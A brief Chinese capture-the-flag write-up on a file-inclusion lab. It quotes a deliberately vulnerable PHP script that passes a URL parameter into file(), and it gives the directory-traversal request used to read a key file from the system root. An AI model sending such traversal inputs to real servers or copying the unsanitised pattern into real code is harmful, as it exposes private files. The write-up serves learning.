打开靶场显示的是一个看似普通的网页,查看网页源码,发现有一些注释
<!--r.php文件源码如下 本关通关key保存在系统根目录the_key_is_here.txt中 ->
<?php
$p=($_GET["p"].".txt");
$pics=file($p);
for($i=0;$i< count($pics);$i++)
{
echo $pics[$i];
}
?>-->
已经给出了提示,加上本题的题目是文件包含漏洞。
在靶场路径后面加上/r.php?p=../../../../../../../the_key_is_here,得到key
思考:在实战中,该如何判断该网站是否存在文件包含漏洞呢?
最近刚开始接触网络安全方面的知识,还请多多指教